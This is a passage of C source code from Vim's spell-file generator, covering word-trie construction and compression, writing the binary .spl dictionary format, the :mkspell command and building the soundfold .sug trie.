/* Link the new node in the list, there will be one ref. */
np->wn_refs = 1;
if (copyprev != NULL)
*copyprev = np;
copyprev = &np->wn_sibling;
/* Let "node" point to the head of the copied list. */
if (copyp == node)
node = np;
}
}
/* Look for the sibling that has the same character. They are sorted
* on byte value, thus stop searching when a sibling is found with a
* higher byte value. For zero bytes (end of word) the sorting is
* done on flags and then on affixID. */
while (node != NULL
&& (node->wn_byte < word[i]
|| (node->wn_byte == NUL
&& (flags < 0
? node->wn_affixID < (unsigned)affixID
: (node->wn_flags < (unsigned)(flags & WN_MASK)
|| (node->wn_flags == (flags & WN_MASK)
&& (spin->si_sugtree
? (node->wn_region & 0xffff) < region
: node->wn_affixID
< (unsigned)affixID)))))))
{
prev = &node->wn_sibling;
node = *prev;
}
if (node == NULL
|| node->wn_byte != word[i]
|| (word[i] == NUL
&& (flags < 0
|| spin->si_sugtree
|| node->wn_flags != (flags & WN_MASK)
|| node->wn_affixID != affixID)))
{
/* Allocate a new node. */
np = get_wordnode(spin);
if (np == NULL)
return FAIL;
np->wn_byte = word[i];
/* If "node" is NULL this is a new child or the end of the sibling
* list: ref count is one. Otherwise use ref count of sibling and
* make ref count of sibling one (matters when inserting in front
* of the list of siblings). */
if (node == NULL)
np->wn_refs = 1;
else
{
np->wn_refs = node->wn_refs;
node->wn_refs = 1;
}
if (prev != NULL)
*prev = np;
np->wn_sibling = node;
node = np;
}
if (word[i] == NUL)
{
node->wn_flags = flags;
node->wn_region |= region;
node->wn_affixID = affixID;
break;
}
prev = &node->wn_child;
node = *prev;
}
#ifdef SPELL_PRINTTREE
smsg((char_u *)"Added \"%s\"", word);
spell_print_tree(root->wn_sibling);
#endif
/* count nr of words added since last message */
++spin->si_msg_count;
if (spin->si_compress_cnt > 1)
{
if (--spin->si_compress_cnt == 1)
/* Did enough words to lower the block count limit. */
spin->si_blocks_cnt += compress_inc;
}
/*
* When we have allocated lots of memory we need to compress the word tree
* to free up some room. But compression is slow, and we might actually
* need that room, thus only compress in the following situations:
* 1. When not compressed before (si_compress_cnt == 0): when using
* "compress_start" blocks.
* 2. When compressed before and used "compress_inc" blocks before
* adding "compress_added" words (si_compress_cnt > 1).
* 3. When compressed before, added "compress_added" words
* (si_compress_cnt == 1) and the number of free nodes drops below the
* maximum word length.
*/
#ifndef SPELL_COMPRESS_ALLWAYS
if (spin->si_compress_cnt == 1
? spin->si_free_count < MAXWLEN
: spin->si_blocks_cnt >= compress_start)
#endif
{
/* Decrement the block counter. The effect is that we compress again
* when the freed up room has been used and another "compress_inc"
* blocks have been allocated. Unless "compress_added" words have
* been added, then the limit is put back again. */
spin->si_blocks_cnt -= compress_inc;
spin->si_compress_cnt = compress_added;
if (spin->si_verbose)
{
msg_start();
msg_puts((char_u *)_(msg_compressing));
msg_clr_eos();
msg_didout = FALSE;
msg_col = 0;
out_flush();
}
/* Compress both trees. Either they both have many nodes, which makes
* compression useful, or one of them is small, which means
* compression goes fast. But when filling the soundfold word tree
* there is no keep-case tree. */
wordtree_compress(spin, spin->si_foldroot);
if (affixID >= 0)
wordtree_compress(spin, spin->si_keeproot);
}
return OK;
}
/*
* Get a wordnode_T, either from the list of previously freed nodes or
* allocate a new one.
* Returns NULL when out of memory.
*/
static wordnode_T *
get_wordnode(spellinfo_T *spin)
{
wordnode_T *n;
if (spin->si_first_free == NULL)
n = (wordnode_T *)getroom(spin, sizeof(wordnode_T), TRUE);
else
{
n = spin->si_first_free;
spin->si_first_free = n->wn_child;
vim_memset(n, 0, sizeof(wordnode_T));
--spin->si_free_count;
}
#ifdef SPELL_PRINTTREE
if (n != NULL)
n->wn_nr = ++spin->si_wordnode_nr;
#endif
return n;
}
/*
* Decrement the reference count on a node (which is the head of a list of
* siblings). If the reference count becomes zero free the node and its
* siblings.
* Returns the number of nodes actually freed.
*/
static int
deref_wordnode(spellinfo_T *spin, wordnode_T *node)
{
wordnode_T *np;
int cnt = 0;
if (--node->wn_refs == 0)
{
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_child != NULL)
cnt += deref_wordnode(spin, np->wn_child);
free_wordnode(spin, np);
++cnt;
}
++cnt; /* length field */
}
return cnt;
}
/*
* Free a wordnode_T for re-use later.
* Only the "wn_child" field becomes invalid.
*/
static void
free_wordnode(spellinfo_T *spin, wordnode_T *n)
{
n->wn_child = spin->si_first_free;
spin->si_first_free = n;
++spin->si_free_count;
}
/*
* Compress a tree: find tails that are identical and can be shared.
*/
static void
wordtree_compress(spellinfo_T *spin, wordnode_T *root)
{
hashtab_T ht;
int n;
int tot = 0;
int perc;
/* Skip the root itself, it's not actually used. The first sibling is the
* start of the tree. */
if (root->wn_sibling != NULL)
{
hash_init(&ht);
n = node_compress(spin, root->wn_sibling, &ht, &tot);
#ifndef SPELL_PRINTTREE
if (spin->si_verbose || p_verbose > 2)
#endif
{
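	    /* For very large trees divide first, to avoid overflowing
	     * (tot - n) * 100 in the branch below. */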
if (tot > 1000000)
perc = (tot - n) / (tot / 100);
else if (tot == 0)
perc = 0;
else
perc = (tot - n) * 100 / tot;
vim_snprintf((char *)IObuff, IOSIZE,
_("Compressed %d of %d nodes; %d (%d%%) remaining"),
n, tot, tot - n, perc);
spell_message(spin, IObuff);
}
#ifdef SPELL_PRINTTREE
spell_print_tree(root->wn_sibling);
#endif
hash_clear(&ht);
}
}
/*
* Compress a node, its siblings and its children, depth first.
* Returns the number of compressed nodes.
*/
static int
node_compress(
spellinfo_T *spin,
wordnode_T *node,
hashtab_T *ht,
int *tot) /* total count of nodes before compressing,
incremented while going through the tree */
{
wordnode_T *np;
wordnode_T *tp;
wordnode_T *child;
hash_T hash;
hashitem_T *hi;
int len = 0;
unsigned nr, n;
int compressed = 0;
/*
* Go through the list of siblings. Compress each child and then try
* finding an identical child to replace it.
* Note that with "child" we mean not just the node that is pointed to,
* but the whole list of siblings of which the child node is the first.
*/
for (np = node; np != NULL && !got_int; np = np->wn_sibling)
{
++len;
if ((child = np->wn_child) != NULL)
{
/* Compress the child first. This fills hashkey. */
compressed += node_compress(spin, child, ht, tot);
/* Try to find an identical child. */
hash = hash_hash(child->wn_u1.hashkey);
hi = hash_lookup(ht, child->wn_u1.hashkey, hash);
if (!HASHITEM_EMPTY(hi))
{
/* There are children we encountered before with a hash value
* identical to the current child. Now check if there is one
* that is really identical. */
for (tp = HI2WN(hi); tp != NULL; tp = tp->wn_u2.next)
if (node_equal(child, tp))
{
/* Found one! Now use that child in place of the
* current one. This means the current child and all
* its siblings is unlinked from the tree. */
++tp->wn_refs;
compressed += deref_wordnode(spin, child);
np->wn_child = tp;
break;
}
if (tp == NULL)
{
/* No other child with this hash value equals the child of
* the node, add it to the linked list after the first
* item. */
tp = HI2WN(hi);
child->wn_u2.next = tp->wn_u2.next;
tp->wn_u2.next = child;
}
}
else
/* No other child has this hash value, add it to the
* hashtable. */
hash_add_item(ht, hi, child->wn_u1.hashkey, hash);
}
}
*tot += len + 1; /* add one for the node that stores the length */
/*
* Make a hash key for the node and its siblings, so that we can quickly
* find a lookalike node. This must be done after compressing the sibling
* list, otherwise the hash key would become invalid by the compression.
*/
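    /* Key layout: byte 0 is the sibling count, bytes 1-4 hold a 32 bit mix of
     * all siblings (zero bytes are mapped to 1 below) and byte 5 is the NUL
     * terminator, so the key can be used as a hash table string. */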
node->wn_u1.hashkey[0] = len;
nr = 0;
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_byte == NUL)
/* end node: use wn_flags, wn_region and wn_affixID */
n = np->wn_flags + (np->wn_region << 8) + (np->wn_affixID << 16);
else
/* byte node: use the byte value and the child pointer */
n = (unsigned)(np->wn_byte + ((long_u)np->wn_child << 8));
nr = nr * 101 + n;
}
/* Avoid NUL bytes, it terminates the hash key. */
n = nr & 0xff;
node->wn_u1.hashkey[1] = n == 0 ? 1 : n;
n = (nr >> 8) & 0xff;
node->wn_u1.hashkey[2] = n == 0 ? 1 : n;
n = (nr >> 16) & 0xff;
node->wn_u1.hashkey[3] = n == 0 ? 1 : n;
n = (nr >> 24) & 0xff;
node->wn_u1.hashkey[4] = n == 0 ? 1 : n;
node->wn_u1.hashkey[5] = NUL;
/* Check for CTRL-C pressed now and then. */
fast_breakcheck();
return compressed;
}
/*
* Return TRUE when two nodes have identical siblings and children.
*/
static int
node_equal(wordnode_T *n1, wordnode_T *n2)
{
wordnode_T *p1;
wordnode_T *p2;
for (p1 = n1, p2 = n2; p1 != NULL && p2 != NULL;
p1 = p1->wn_sibling, p2 = p2->wn_sibling)
if (p1->wn_byte != p2->wn_byte
|| (p1->wn_byte == NUL
? (p1->wn_flags != p2->wn_flags
|| p1->wn_region != p2->wn_region
|| p1->wn_affixID != p2->wn_affixID)
: (p1->wn_child != p2->wn_child)))
break;
return p1 == NULL && p2 == NULL;
}
static int
#ifdef __BORLANDC__
_RTLENTRYF
#endif
rep_compare(const void *s1, const void *s2);
/*
* Function given to qsort() to sort the REP items on "from" string.
*/
static int
#ifdef __BORLANDC__
_RTLENTRYF
#endif
rep_compare(const void *s1, const void *s2)
{
fromto_T *p1 = (fromto_T *)s1;
fromto_T *p2 = (fromto_T *)s2;
return STRCMP(p1->ft_from, p2->ft_from);
}
/*
* Write the Vim .spl file "fname".
 * Return FAIL or OK.
*/
static int
write_vim_spell(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
int regionmask;
int round;
wordnode_T *tree;
int nodecount;
int i;
int l;
garray_T *gap;
fromto_T *ftp;
char_u *p;
int rr;
int retval = OK;
size_t fwv = 1; /* collect return value of fwrite() to avoid
warnings from picky compiler */
fd = mch_fopen((char *)fname, "w");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
/* <HEADER>: <fileID> <versionnr> */
/* <fileID> */
fwv &= fwrite(VIMSPELLMAGIC, VIMSPELLMAGICL, (size_t)1, fd);
if (fwv != (size_t)1)
/* Catch first write error, don't try writing more. */
goto theend;
putc(VIMSPELLVERSION, fd); /* <versionnr> */
/*
* <SECTIONS>: <section> ... <sectionend>
*/
/* SN_INFO: <infotext> */
if (spin->si_info != NULL)
{
putc(SN_INFO, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
i = (int)STRLEN(spin->si_info);
put_bytes(fd, (long_u)i, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_info, (size_t)i, (size_t)1, fd); /* <infotext> */
}
/* SN_REGION: <regionname> ...
* Write the region names only if there is more than one. */
if (spin->si_region_count > 1)
{
putc(SN_REGION, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
l = spin->si_region_count * 2;
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_region_name, (size_t)l, (size_t)1, fd);
/* <regionname> ... */
regionmask = (1 << spin->si_region_count) - 1;
}
else
regionmask = 0;
/* SN_CHARFLAGS: <charflagslen> <charflags> <folcharslen> <folchars>
*
* The table with character flags and the table for case folding.
* This makes sure the same characters are recognized as word characters
 * when generating and when using a spell file.
* Skip this for ASCII, the table may conflict with the one used for
* 'encoding'.
* Also skip this for an .add.spl file, the main spell file must contain
* the table (avoids that it conflicts). File is shorter too.
*/
if (!spin->si_ascii && !spin->si_add)
{
char_u folchars[128 * 8];
int flags;
putc(SN_CHARFLAGS, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
/* Form the <folchars> string first, we need to know its length. */
l = 0;
for (i = 128; i < 256; ++i)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
l += mb_char2bytes(spelltab.st_fold[i], folchars + l);
else
#endif
folchars[l++] = spelltab.st_fold[i];
}
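	/* <sectionlen> = 1 byte <charflagslen> + 128 <charflags> bytes
	 * + 2 bytes <folcharslen> + l <folchars> bytes. */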
put_bytes(fd, (long_u)(1 + 128 + 2 + l), 4); /* <sectionlen> */
fputc(128, fd); /* <charflagslen> */
for (i = 128; i < 256; ++i)
{
flags = 0;
if (spelltab.st_isw[i])
flags |= CF_WORD;
if (spelltab.st_isu[i])
flags |= CF_UPPER;
fputc(flags, fd); /* <charflags> */
}
put_bytes(fd, (long_u)l, 2); /* <folcharslen> */
fwv &= fwrite(folchars, (size_t)l, (size_t)1, fd); /* <folchars> */
}
/* SN_MIDWORD: <midword> */
if (spin->si_midword != NULL)
{
putc(SN_MIDWORD, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
i = (int)STRLEN(spin->si_midword);
put_bytes(fd, (long_u)i, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_midword, (size_t)i, (size_t)1, fd);
/* <midword> */
}
/* SN_PREFCOND: <prefcondcnt> <prefcond> ... */
if (spin->si_prefcond.ga_len > 0)
{
putc(SN_PREFCOND, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
l = write_spell_prefcond(NULL, &spin->si_prefcond);
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
write_spell_prefcond(fd, &spin->si_prefcond);
}
/* SN_REP: <repcount> <rep> ...
* SN_SAL: <salflags> <salcount> <sal> ...
* SN_REPSAL: <repcount> <rep> ... */
/* round 1: SN_REP section
* round 2: SN_SAL section (unless SN_SOFO is used)
* round 3: SN_REPSAL section */
for (round = 1; round <= 3; ++round)
{
if (round == 1)
gap = &spin->si_rep;
else if (round == 2)
{
/* Don't write SN_SAL when using a SN_SOFO section */
if (spin->si_sofofr != NULL && spin->si_sofoto != NULL)
continue;
gap = &spin->si_sal;
}
else
gap = &spin->si_repsal;
/* Don't write the section if there are no items. */
if (gap->ga_len == 0)
continue;
/* Sort the REP/REPSAL items. */
if (round != 2)
qsort(gap->ga_data, (size_t)gap->ga_len,
sizeof(fromto_T), rep_compare);
i = round == 1 ? SN_REP : (round == 2 ? SN_SAL : SN_REPSAL);
putc(i, fd); /* <sectionID> */
/* This is for making suggestions, section is not required. */
putc(0, fd); /* <sectionflags> */
/* Compute the length of what follows. */
l = 2; /* count <repcount> or <salcount> */
for (i = 0; i < gap->ga_len; ++i)
{
ftp = &((fromto_T *)gap->ga_data)[i];
l += 1 + (int)STRLEN(ftp->ft_from); /* count <*fromlen> and <*from> */
l += 1 + (int)STRLEN(ftp->ft_to); /* count <*tolen> and <*to> */
}
if (round == 2)
++l; /* count <salflags> */
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
if (round == 2)
{
i = 0;
if (spin->si_followup)
i |= SAL_F0LLOWUP;
if (spin->si_collapse)
i |= SAL_COLLAPSE;
if (spin->si_rem_accents)
i |= SAL_REM_ACCENTS;
putc(i, fd); /* <salflags> */
}
put_bytes(fd, (long_u)gap->ga_len, 2); /* <repcount> or <salcount> */
for (i = 0; i < gap->ga_len; ++i)
{
/* <rep> : <repfromlen> <repfrom> <reptolen> <repto> */
/* <sal> : <salfromlen> <salfrom> <saltolen> <salto> */
ftp = &((fromto_T *)gap->ga_data)[i];
for (rr = 1; rr <= 2; ++rr)
{
p = rr == 1 ? ftp->ft_from : ftp->ft_to;
l = (int)STRLEN(p);
putc(l, fd);
if (l > 0)
fwv &= fwrite(p, l, (size_t)1, fd);
}
}
}
/* SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* This is for making suggestions, section is not required. */
if (spin->si_sofofr != NULL && spin->si_sofoto != NULL)
{
putc(SN_SOFO, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_sofofr);
put_bytes(fd, (long_u)(l + STRLEN(spin->si_sofoto) + 4), 4);
/* <sectionlen> */
put_bytes(fd, (long_u)l, 2); /* <sofofromlen> */
fwv &= fwrite(spin->si_sofofr, l, (size_t)1, fd); /* <sofofrom> */
l = (int)STRLEN(spin->si_sofoto);
put_bytes(fd, (long_u)l, 2); /* <sofotolen> */
fwv &= fwrite(spin->si_sofoto, l, (size_t)1, fd); /* <sofoto> */
}
/* SN_WORDS: <word> ...
* This is for making suggestions, section is not required. */
if (spin->si_commonwords.ht_used > 0)
{
putc(SN_WORDS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
/* round 1: count the bytes
* round 2: write the bytes */
for (round = 1; round <= 2; ++round)
{
int todo;
int len = 0;
hashitem_T *hi;
todo = (int)spin->si_commonwords.ht_used;
for (hi = spin->si_commonwords.ht_array; todo > 0; ++hi)
if (!HASHITEM_EMPTY(hi))
{
l = (int)STRLEN(hi->hi_key) + 1;
len += l;
if (round == 2) /* <word> */
fwv &= fwrite(hi->hi_key, (size_t)l, (size_t)1, fd);
--todo;
}
if (round == 1)
put_bytes(fd, (long_u)len, 4); /* <sectionlen> */
}
}
/* SN_MAP: <mapstr>
* This is for making suggestions, section is not required. */
if (spin->si_map.ga_len > 0)
{
putc(SN_MAP, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = spin->si_map.ga_len;
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_map.ga_data, (size_t)l, (size_t)1, fd);
/* <mapstr> */
}
/* SN_SUGFILE: <timestamp>
* This is used to notify that a .sug file may be available and at the
* same time allows for checking that a .sug file that is found matches
* with this .spl file. That's because the word numbers must be exactly
* right. */
if (!spin->si_nosugfile
&& (spin->si_sal.ga_len > 0
|| (spin->si_sofofr != NULL && spin->si_sofoto != NULL)))
{
putc(SN_SUGFILE, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)8, 4); /* <sectionlen> */
/* Set si_sugtime and write it to the file. */
spin->si_sugtime = time(NULL);
put_time(fd, spin->si_sugtime); /* <timestamp> */
}
/* SN_NOSPLITSUGS: nothing
* This is used to notify that no suggestions with word splits are to be
* made. */
if (spin->si_nosplitsugs)
{
putc(SN_NOSPLITSUGS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_NOCOMPOUNDSUGS: nothing
* This is used to notify that no suggestions with compounds are to be
* made. */
if (spin->si_nocompoundsugs)
{
putc(SN_NOCOMPOUNDSUGS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_COMPOUND: compound info.
* We don't mark it required, when not supported all compound words will
* be bad words. */
if (spin->si_compflags != NULL)
{
putc(SN_COMPOUND, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_compflags);
for (i = 0; i < spin->si_comppat.ga_len; ++i)
l += (int)STRLEN(((char_u **)(spin->si_comppat.ga_data))[i]) + 1;
put_bytes(fd, (long_u)(l + 7), 4); /* <sectionlen> */
putc(spin->si_compmax, fd); /* <compmax> */
putc(spin->si_compminlen, fd); /* <compminlen> */
putc(spin->si_compsylmax, fd); /* <compsylmax> */
putc(0, fd); /* for Vim 7.0b compatibility */
putc(spin->si_compoptions, fd); /* <compoptions> */
put_bytes(fd, (long_u)spin->si_comppat.ga_len, 2);
/* <comppatcount> */
for (i = 0; i < spin->si_comppat.ga_len; ++i)
{
p = ((char_u **)(spin->si_comppat.ga_data))[i];
putc((int)STRLEN(p), fd); /* <comppatlen> */
fwv &= fwrite(p, (size_t)STRLEN(p), (size_t)1, fd);
/* <comppattext> */
}
/* <compflags> */
fwv &= fwrite(spin->si_compflags, (size_t)STRLEN(spin->si_compflags),
(size_t)1, fd);
}
/* SN_NOBREAK: NOBREAK flag */
if (spin->si_nobreak)
{
putc(SN_NOBREAK, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
/* It's empty, the presence of the section flags the feature. */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_SYLLABLE: syllable info.
* We don't mark it required, when not supported syllables will not be
* counted. */
if (spin->si_syllable != NULL)
{
putc(SN_SYLLABLE, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_syllable);
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_syllable, (size_t)l, (size_t)1, fd);
/* <syllable> */
}
/* end of <SECTIONS> */
putc(SN_END, fd); /* <sectionend> */
/*
* <LWORDTREE> <KWORDTREE> <PREFIXTREE>
*/
spin->si_memtot = 0;
for (round = 1; round <= 3; ++round)
{
if (round == 1)
tree = spin->si_foldroot->wn_sibling;
else if (round == 2)
tree = spin->si_keeproot->wn_sibling;
else
tree = spin->si_prefroot->wn_sibling;
/* Clear the index and wnode fields in the tree. */
clear_node(tree);
/* Count the number of nodes. Needed to be able to allocate the
* memory when reading the nodes. Also fills in index for shared
* nodes. */
nodecount = put_node(NULL, tree, 0, regionmask, round == 3);
/* number of nodes in 4 bytes */
put_bytes(fd, (long_u)nodecount, 4); /* <nodecount> */
spin->si_memtot += nodecount + nodecount * sizeof(int);
/* Write the nodes. */
(void)put_node(fd, tree, 0, regionmask, round == 3);
}
/* Write another byte to check for errors (file system full). */
if (putc(0, fd) == EOF)
retval = FAIL;
theend:
if (fclose(fd) == EOF)
retval = FAIL;
if (fwv != (size_t)1)
retval = FAIL;
if (retval == FAIL)
EMSG(_(e_write));
return retval;
}
/*
 * Clear the index and wnode fields of "node", its siblings and its
* children. This is needed because they are a union with other items to save
* space.
*/
static void
clear_node(wordnode_T *node)
{
wordnode_T *np;
if (node != NULL)
for (np = node; np != NULL; np = np->wn_sibling)
{
np->wn_u1.index = 0;
np->wn_u2.wnode = NULL;
if (np->wn_byte != NUL)
clear_node(np->wn_child);
}
}
/*
* Dump a word tree at node "node".
*
* This first writes the list of possible bytes (siblings). Then for each
* byte recursively write the children.
*
* NOTE: The code here must match the code in read_tree_node(), since
* assumptions are made about the indexes (so that we don't have to write them
* in the file).
*
* Returns the number of nodes used.
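 *
 * put_node() is called twice per tree: first with "fd" == NULL to count the
 * nodes and fill in wn_u1.index, then again to actually write the bytes.
 * wn_u2.wnode remembers which parent "owns" a shared child, so a shared tail
 * is written only once and referenced with BY_INDEX from the other parents.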
*/
static int
put_node(
FILE *fd, /* NULL when only counting */
wordnode_T *node,
int idx,
int regionmask,
int prefixtree) /* TRUE for PREFIXTREE */
{
int newindex = idx;
int siblingcount = 0;
wordnode_T *np;
int flags;
/* If "node" is zero the tree is empty. */
if (node == NULL)
return 0;
/* Store the index where this node is written. */
node->wn_u1.index = idx;
/* Count the number of siblings. */
for (np = node; np != NULL; np = np->wn_sibling)
++siblingcount;
/* Write the sibling count. */
if (fd != NULL)
putc(siblingcount, fd); /* <siblingcount> */
/* Write each sibling byte and optionally extra info. */
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_byte == 0)
{
if (fd != NULL)
{
/* For a NUL byte (end of word) write the flags etc. */
if (prefixtree)
{
/* In PREFIXTREE write the required affixID and the
* associated condition nr (stored in wn_region). The
* byte value is misused to store the "rare" and "not
* combining" flags */
if (np->wn_flags == (short_u)PFX_FLAGS)
putc(BY_NOFLAGS, fd); /* <byte> */
else
{
putc(BY_FLAGS, fd); /* <byte> */
putc(np->wn_flags, fd); /* <pflags> */
}
putc(np->wn_affixID, fd); /* <affixID> */
put_bytes(fd, (long_u)np->wn_region, 2); /* <prefcondnr> */
}
else
{
/* For word trees we write the flag/region items. */
flags = np->wn_flags;
if (regionmask != 0 && np->wn_region != regionmask)
flags |= WF_REGION;
if (np->wn_affixID != 0)
flags |= WF_AFX;
if (flags == 0)
{
/* word without flags or region */
putc(BY_NOFLAGS, fd); /* <byte> */
}
else
{
if (np->wn_flags >= 0x100)
{
putc(BY_FLAGS2, fd); /* <byte> */
putc(flags, fd); /* <flags> */
putc((unsigned)flags >> 8, fd); /* <flags2> */
}
else
{
putc(BY_FLAGS, fd); /* <byte> */
putc(flags, fd); /* <flags> */
}
if (flags & WF_REGION)
putc(np->wn_region, fd); /* <region> */
if (flags & WF_AFX)
putc(np->wn_affixID, fd); /* <affixID> */
}
}
}
}
else
{
if (np->wn_child->wn_u1.index != 0
&& np->wn_child->wn_u2.wnode != node)
{
/* The child is written elsewhere, write the reference. */
if (fd != NULL)
{
putc(BY_INDEX, fd); /* <byte> */
/* <nodeidx> */
put_bytes(fd, (long_u)np->wn_child->wn_u1.index, 3);
}
}
else if (np->wn_child->wn_u2.wnode == NULL)
/* We will write the child below and give it an index. */
np->wn_child->wn_u2.wnode = node;
if (fd != NULL)
if (putc(np->wn_byte, fd) == EOF) /* <byte> or <xbyte> */
{
EMSG(_(e_write));
return 0;
}
}
}
/* Space used in the array when reading: one for each sibling and one for
* the count. */
newindex += siblingcount + 1;
/* Recursively dump the children of each sibling. */
for (np = node; np != NULL; np = np->wn_sibling)
if (np->wn_byte != 0 && np->wn_child->wn_u2.wnode == node)
newindex = put_node(fd, np->wn_child, newindex, regionmask,
prefixtree);
return newindex;
}
/*
* ":mkspell [-ascii] outfile infile ..."
* ":mkspell [-ascii] addfile"
*/
void
ex_mkspell(exarg_T *eap)
{
int fcount;
char_u **fnames;
char_u *arg = eap->arg;
int ascii = FALSE;
if (STRNCMP(arg, "-ascii", 6) == 0)
{
ascii = TRUE;
arg = skipwhite(arg + 6);
}
/* Expand all the remaining arguments (e.g., $VIMRUNTIME). */
if (get_arglist_exp(arg, &fcount, &fnames, FALSE) == OK)
{
mkspell(fcount, fnames, ascii, eap->forceit, FALSE);
FreeWild(fcount, fnames);
}
}
/*
* Create the .sug file.
* Uses the soundfold info in "spin".
* Writes the file with the name "wfname", with ".spl" changed to ".sug".
*/
static void
spell_make_sugfile(spellinfo_T *spin, char_u *wfname)
{
char_u *fname = NULL;
int len;
slang_T *slang;
int free_slang = FALSE;
/*
* Read back the .spl file that was written. This fills the required
* info for soundfolding. This also uses less memory than the
* pointer-linked version of the trie. And it avoids having two versions
* of the code for the soundfolding stuff.
* It might have been done already by spell_reload_one().
*/
for (slang = first_lang; slang != NULL; slang = slang->sl_next)
if (fullpathcmp(wfname, slang->sl_fname, FALSE) == FPC_SAME)
break;
if (slang == NULL)
{
spell_message(spin, (char_u *)_("Reading back spell file..."));
slang = spell_load_file(wfname, NULL, NULL, FALSE);
if (slang == NULL)
return;
free_slang = TRUE;
}
/*
* Clear the info in "spin" that is used.
*/
spin->si_blocks = NULL;
spin->si_blocks_cnt = 0;
    spin->si_compress_cnt = 0;	/* will stay at 0 all the time */
spin->si_free_count = 0;
spin->si_first_free = NULL;
spin->si_foldwcount = 0;
/*
* Go through the trie of good words, soundfold each word and add it to
* the soundfold trie.
*/
spell_message(spin, (char_u *)_("Performing soundfolding..."));
if (sug_filltree(spin, slang) == FAIL)
goto theend;
/*
* Create the table which links each soundfold word with a list of the
* good words it may come from. Creates buffer "spin->si_spellbuf".
* This also removes the wordnr from the NUL byte entries to make
* compression possible.
*/
if (sug_maketable(spin) == FAIL)
goto theend;
smsg((char_u *)_("Number of words after soundfolding: %ld"),
(long)spin->si_spellbuf->b_ml.ml_line_count);
/*
* Compress the soundfold trie.
*/
spell_message(spin, (char_u *)_(msg_compressing));
wordtree_compress(spin, spin->si_foldroot);
/*
* Write the .sug file.
* Make the file name by changing ".spl" to ".sug".
*/
fname = alloc(MAXPATHL);
if (fname == NULL)
goto theend;
vim_strncpy(fname, wfname, MAXPATHL - 1);
len = (int)STRLEN(fname);
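    /* Overwrite the final "pl" of ".spl" with "ug" to get the ".sug" name. */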
fname[len - 2] = 'u';
fname[len - 1] = 'g';
sug_write(spin, fname);
theend:
vim_free(fname);
if (free_slang)
slang_free(slang);
free_blocks(spin->si_blocks);
close_spellbuf(spin->si_spellbuf);
}
/*
* Build the soundfold trie for language "slang".
*/
static int
sug_filltree(spellinfo_T *spin, slang_T *slang)
{
char_u *byts;
idx_T *idxs;
int depth;
idx_T arridx[MAXWLEN];
int curi[MAXWLEN];
char_u tword[MAXWLEN];
char_u tsalword[MAXWLEN];
int c;
idx_T n;
unsigned words_done = 0;
int wordcount[MAXWLEN];
/* We use si_foldroot for the soundfolded trie. */
spin->si_foldroot = wordtree_alloc(spin);
if (spin->si_foldroot == NULL)
return FAIL;
/* let tree_add_word() know we're adding to the soundfolded tree */
spin->si_sugtree = TRUE;
/*
* Go through the whole case-folded tree, soundfold each word and put it
* in the trie.
*/
byts = slang->sl_fbyts;
idxs = slang->sl_fidxs;
arridx[0] = 0;
curi[0] = 1;
wordcount[0] = 0;
depth = 0;
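    /* Iterative depth-first walk of the case-folded trie: for each depth,
     * arridx[] is the index of the node's sibling-count byte, curi[] is the
     * (1-based) offset of the next sibling byte to visit and wordcount[]
     * counts the words found below that node. */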
while (depth >= 0 && !got_int)
{
if (curi[depth] > byts[arridx[depth]])
{
/* Done all bytes at this node, go up one level. */
idxs[arridx[depth]] = wordcount[depth];
if (depth > 0)
wordcount[depth - 1] += wordcount[depth];
--depth;
line_breakcheck();
}
else
{
/* Do one more byte at this node. */
n = arridx[depth] + curi[depth];
++curi[depth];
c = byts[n];
if (c == 0)
{
/* Sound-fold the word. */
tword[depth] = NUL;
spell_soundfold(slang, tword, TRUE, tsalword);
/* We use the "flags" field for the MSB of the wordnr,
* "region" for the LSB of the wordnr. */
if (tree_add_word(spin, tsalword, spin->si_foldroot,
words_done >> 16, words_done & 0xffff,
0) == FAIL)
return FAIL;
++words_done;
++wordcount[depth];
/* Reset the block count each time to avoid compression
* kicking in. */
spin->si_blocks_cnt = 0;
/* Skip over any other NUL bytes (same word with different
* flags). */
while (byts[n + 1] == 0)
{
++n;
++curi[depth];
}
}
else
{
/* Normal char, go one level deeper. */
tword[depth++] = c;
arridx[depth] = idxs[n];
curi[depth] = 1;
wordcount[depth] = 0;
}
}
}
smsg((char_u *)_("Total number of words: %d"), words_done);
return OK;
}
/*
* Make the table that links each word in the soundfold trie to the words it
* can be produced from.
* This is not unlike lines in a file, thus use a memfile to be able to access
* the table efficiently.
* Returns FAIL when out of memory.
*/
static int
sug_maketable(spellinfo_T *spin)
{
garray_T ga;
int res = OK;
